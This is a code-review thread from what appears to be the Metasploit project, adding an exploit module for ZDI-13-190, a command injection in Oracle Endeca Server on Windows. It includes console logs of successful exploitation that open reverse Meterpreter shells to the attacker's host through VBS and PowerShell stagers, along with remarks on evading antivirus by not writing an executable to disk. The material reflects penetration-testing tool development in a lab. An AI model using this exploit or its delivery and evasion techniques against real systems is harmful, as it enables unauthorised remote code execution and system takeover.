Add module for ZDI-13-190

[jvazquez-r7]

Tested successfully with Oracle Endeca Server 7.4.0.787 / Microsoft Windows 2008 R2. Oracle Endeca Server can be downloaded from: http://www.oracle.com/technetwork/middleware/endecaserver/downloads/endeca-server-downloads-1721978.html

The vulnerable method only exists on the 7.4.0 branch and isn't available on the 7.5.5.1 branch. On the other hand, the injection has been found to be Windows specific. This module has been tested successfully on Endeca Server 7.4.0.787 over Windows 2008 R2 (64 bits).

Test:

msf exploit(oracle_endeca_exec) > check

[*] 192.168.172.201:7770 - Version found: Oracle Endeca Server 7.4.0.787
[+] The target is vulnerable.
msf exploit(oracle_endeca_exec) > exploit

[*] Started reverse handler on 192.168.172.1:4444 
[*] 192.168.172.201:7770 - Exploiting by deploying a VBS CMD Stager...
[*] Command Stager progress -   7.42% done (7499/101079 bytes)
[*] Command Stager progress -  14.84% done (14998/101079 bytes)
[*] Command Stager progress -  22.26% done (22497/101079 bytes)
[*] Command Stager progress -  29.68% done (29996/101079 bytes)
[*] Command Stager progress -  37.09% done (37495/101079 bytes)
[*] Command Stager progress -  44.51% done (44994/101079 bytes)
[*] Command Stager progress -  51.93% done (52493/101079 bytes)
[*] Command Stager progress -  59.35% done (59992/101079 bytes)
[*] Command Stager progress -  66.77% done (67491/101079 bytes)
[*] Command Stager progress -  74.19% done (74990/101079 bytes)
[*] Command Stager progress -  81.61% done (82489/101079 bytes)
[*] Command Stager progress -  89.03% done (89988/101079 bytes)
[*] Command Stager progress -  96.45% done (97487/101079 bytes)
[*] Sending stage (751104 bytes) to 192.168.172.201
[*] Command Stager progress - 100.25% done (101335/101079 bytes)
[*] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.201:49346) at 2013-08-21 12:59:01 -0500

meterpreter > getuid
Server username: WIN-KBF2BO065KF\juan
meterpreter > sysinfo
Computer        : WIN-KBF2BO065KF
OS              : Windows 2008 R2 (Build 7600).
Architecture    : x64 (Current Process is WOW64)
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit -y
[*] Shutting down Meterpreter...

[*] 192.168.172.201 - Meterpreter session 1 closed.  Reason: User exit

[wchen-r7]

Please normalize this to avoid possible double slashes made by the user.

[Meatballs1]

Even better with a powershell cmdstager - 1 cmd exec rather than all the multiple execs > file ;)

[jvazquez-r7]

@Meatballs1, do you mean through executing the powershell encoded payload from a Web location, like in ms13_005_hwnd_broadcast :?

If it's the case I don't like a lot the option for a Server side exploit.

[Meatballs1]

No like psexec_psh

[jvazquez-r7]

@Meatballs1 liked :-)

Bad thing (just pointing): there isn't a CMD Stager really around the psh feature, so no command line split feature, you need to put the full command in just one injection. Shouldn't be an issue in this case due to the cmd on W2008 allowing really long commands (8191 chars). Doing some calculations to be sure payloads fit and updating.

Since the supported operating system for Endeca is W2008 I like this way of proceeding. If someone disagrees just let me know!

[jvazquez-r7]

Switched to powershell:

• Good thing: both 32 and 64 bits payloads are compatible now.
• Bad thing: difficult to calculate the max length payload prior to all the psh encapsulation stuff, so adding a check after encoding the command, and failing if the payload doesn't fit into the command. Shouldn't be a problem since most of the windows payloads are staged.
• Test with 64 bits payloads:

msf exploit(oracle_endeca_exec) > set RHOST 192.168.172.201
RHOST => 192.168.172.201
msf exploit(oracle_endeca_exec) > set payload windows/x64/meterpreter/reverse_tcp 
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(oracle_endeca_exec) > rexploit
[*] Reloading module...

[-] Exploit failed: The following options failed to validate: LHOST.
msf exploit(oracle_endeca_exec) > set lhost 192.168.172.1
lhost => 192.168.172.1
msf exploit(oracle_endeca_exec) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] 192.168.172.201:7770 - Exploiting through Powershell...
[*] Sending stage (951296 bytes) to 192.168.172.201
[*] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.201:49171) at 2013-08-23 14:38:21 -0500

meterpreter > sysinfo
gComputer        : WIN-KBF2BO065KF
OS              : Windows 2008 R2 (Build 7600).
Architecture    : x64
System Language : en_US
Meterpreter     : x64/win64
meterpreter > getuid
Server username: WIN-KBF2BO065KF\Administrator
meterpreter > exit
[*] Shutting down Meterpreter...

• Test with 32 bits payloads, remember to use RUN_WOW64:

msf exploit(oracle_endeca_exec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(oracle_endeca_exec) > set RUN_WOW64 true
RUN_WOW64 => true
msf exploit(oracle_endeca_exec) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] 192.168.172.201:7770 - Exploiting through Powershell...
[*] Sending stage (751104 bytes) to 192.168.172.201
[*] Meterpreter session 2 opened (192.168.172.1:4444 -> 192.168.172.201:49172) at 2013-08-23 14:38:43 -0500

meterpreter > sysinfo
Computer        : WIN-KBF2BO065KF
OS              : Windows 2008 R2 (Build 7600).
Architecture    : x64 (Current Process is WOW64)
System Language : en_US
Meterpreter     : x86/win32
meterpreter > getuid
Server username: WIN-KBF2BO065KF\Administrator
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.172.201 - Meterpreter session 2 closed.  Reason: User exit
msf exploit(oracle_endeca_exec) > exit -y

[Meatballs1]

Yeah for most cmd exec on windows powershell can do a one liner.

If you needed more would be possible to do a psh cmd stager to drop a ps1 (or into env vars) that can auto detect architecture too (would have to drop both payloads). Avoids writing a stock exe so much less likely to be picked up by AV.